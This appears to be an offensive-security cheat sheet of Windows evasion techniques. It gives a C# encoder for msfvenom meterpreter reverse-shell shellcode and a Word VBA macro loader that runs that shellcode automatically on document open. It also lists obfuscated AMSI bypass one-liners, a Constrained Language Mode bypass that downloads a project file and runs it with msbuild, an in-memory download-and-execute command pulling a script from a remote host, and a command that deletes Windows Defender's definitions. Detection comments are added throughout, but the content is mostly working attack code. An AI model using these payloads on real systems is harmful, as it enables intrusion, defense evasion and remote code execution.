Bypass All The Things

Encode payload with Byte Shifting

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;

namespace EncryptVBA
{
        /// <summary>
        /// Console helper that takes a raw shellcode byte array (pasted in as <c>buf</c>)
        /// and prints it as a comma-separated list of decimal values, each byte
        /// incremented by 2 (mod 256), with a VBA line-continuation token every 50 values.
        /// </summary>
        /// <remarks>
        /// The transform is a trivial, fully reversible byte shift: it provides no
        /// confidentiality and only changes the static byte pattern, so it is at best a
        /// speed bump for signature matching. Any consumer must subtract 2 from every
        /// value before use.
        /// NOTE(review): <c>buf</c> is never declared in this listing; it does not compile
        /// until a <c>byte[] buf</c> definition is pasted at the marked spot in Main.
        /// </remarks>
        class Program
        {
            /// <summary>Entry point. <paramref name="args"/> is unused.</summary>
            static void Main(string[] args)
            {
            // byte[] buf = ... from msfvenom command, just paste
            
            // HERE
            
            // msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.45.173 LPORT=8080 -f csharp
            // -----
            // Shift every byte up by 2; the & 0xFF wraps 254/255 around to 0/1.
            byte[] encoded = new byte[buf.Length];
                for (int i = 0; i < buf.Length; i++)
                {
                    encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);
                }
                uint counter = 0;
                // Despite the name, the builder holds decimal ("{0:D}") values, not hex.
                // The capacity is only a hint; each value may take up to 4 characters
                // and the builder grows as needed.
                StringBuilder hex = new StringBuilder(encoded.Length * 2);
                foreach (byte b in encoded)
                {
                    // Every value gets a trailing comma, including the last one.
                    hex.AppendFormat("{0:D},", b);
                    counter++;
                    // After every 50 values emit " _" + newline, VBA's line-continuation
                    // token, so the output can be pasted into a VBA Array(...) literal.
                    if (counter % 50 == 0)
                    {
                        hex.AppendFormat(" _{0}", Environment.NewLine);
                    }
                }

                Console.WriteLine("The payload is: " + hex.ToString());
            }
        }
    }

For quick compilation of the C# file, use csc.exe:

c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe z:\encodepayload.cs

VBA Script decode payload with Byte Shifting

Make sure every line of your shellcode array ends with " _" (a space followed by an underscore), which is VBA's line-continuation token:

' Win32 imports used by MyMacro. Taken together (VirtualAlloc of executable
' memory, RtlMoveMemory into it, CreateThread on it, all from an Office
' process) they form the classic macro shellcode-loader pattern that
' macro-scanning defenses such as AMSI for Office VBA are built to flag.
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
' Decodes the byte-shifted payload array, copies it into freshly allocated
' executable memory and starts a thread on it. From a defender's view every
' step is observable: a VirtualAlloc with &H40 (PAGE_EXECUTE_READWRITE) from
' an Office process, a byte-wise RtlMoveMemory loop, and then CreateThread on
' an address that does not belong to any loaded module.
Sub MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long


' Placeholder: the encoder's decimal output is pasted here.
buf = Array(EncodedPayloadPasteHere)
' Undo the encoder's +2 shift on every element.
For i = 0 To UBound(buf)
 buf(i) = buf(i) - 2
Next i
' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
' One byte per call (lLength = 1): only the low byte of data is copied.
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
' Execution begins at addr; the returned thread handle is stored but never used.
res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub


' Word document-level auto-execute entry point: runs when the document opens.
' Auto-run macro names like this are among the first things macro triage
' tooling reports.
Sub Document_Open()
MyMacro
End Sub
' Legacy Word auto-run macro name with the same trigger intent as
' Document_Open; it is equally visible to macro triage tooling.
Sub AutoOpen()
MyMacro
End Sub

AMSI Bypass

always works.

# Reflection-based tamper with PowerShell's AMSI integration; the type and
# field names are assembled at runtime from string fragments with -f and '+'
# so the plain identifiers never appear in the script text. Detection note:
# Script Block Logging (Event ID 4104) still records this text as submitted,
# and the heavy string-reassembly and mixed-case style is itself a common
# hunting heuristic.
SeT-Item ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varIABLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."AssEmbly"."GETTYPe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."getfiElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sETVaLUE"(  ${nULl},${tRuE} )

more advanced

# Same reflection-based AMSI tamper, with backtick escapes inside member
# names and variable names to defeat naive substring matching. Detection
# note: the backtick-in-identifier pattern has no legitimate reason to
# appear in scripts and is a strong signal on its own; Script Block Logging
# (Event ID 4104) records the text as submitted.
SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]("{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ))."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),("{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )

sometimes problem with CLM

# Variant that locates the AMSI type and its context field through wildcard
# name matches (-like "*iUtils", "*Context") instead of literal names, then
# Marshal::Copy writes a single Int32 of 0 over the memory the field points
# to. Detection note: [Ref].Assembly.GetTypes() enumeration combined with
# GetFields('NonPublic,Static') and Marshal::Copy is a recognisable sequence
# for script-block-based rules; Event ID 4104 records the text as submitted.
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

CLM Bypass

CLM refers to Constrained Language Mode.

Check with this:

# Prints the language mode of the current session; the two values of
# interest are listed below.
$ExecutionContext.SessionState.LanguageMode

# ConstrainedLanguage (this is bad for running powershell script)
# FullLanguage (this is good for us)

Download this file and upload it to the Windows victim machine:

REM Fetches the project file over plain HTTP into C:\Windows\Tasks, a directory
REM commonly writable by standard users. Defender note: both the outbound HTTP
REM fetch to an internal staging host and a .csproj written under C:\Windows
REM are monitorable events.
curl http://192.168.x.x/FullBypass.csproj -o C:\Windows\Tasks\FullBypass.csproj

Then run this command

REM Runs the project with msbuild.exe, a signed Microsoft binary, so the work
REM happens inside a trusted process. Defender note: msbuild.exe launched
REM outside a build/developer context, and especially on a project file in
REM a non-build directory, is a well-known LOLBin pattern; AppLocker/WDAC
REM rules on msbuild.exe and process-creation auditing both cover it.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe .\FullBypass.csproj

Run directly in memory

# Downloads a script as a string and hands it straight to Invoke-Expression,
# so nothing is written to disk. Defender note: because there is no file,
# AMSI and Script Block Logging (Event ID 4104) are the controls that see the
# script's content; the DownloadString + IEX pairing is a widely used
# detection rule on its own.
IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')

Disable Windows Defender

Requires local admin and must be executed via impacket-psexec or psexec.exe.

impacket-psexec needs smb service / port 445

REM Removes all Defender signature definitions (requires local admin).
REM Defender note: the MpCmdRun.exe command line is visible to process-creation
REM auditing when command-line logging is enabled, and Defender's own
REM operational log records definition changes; either is a high-value alert.
"C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all

More Reference
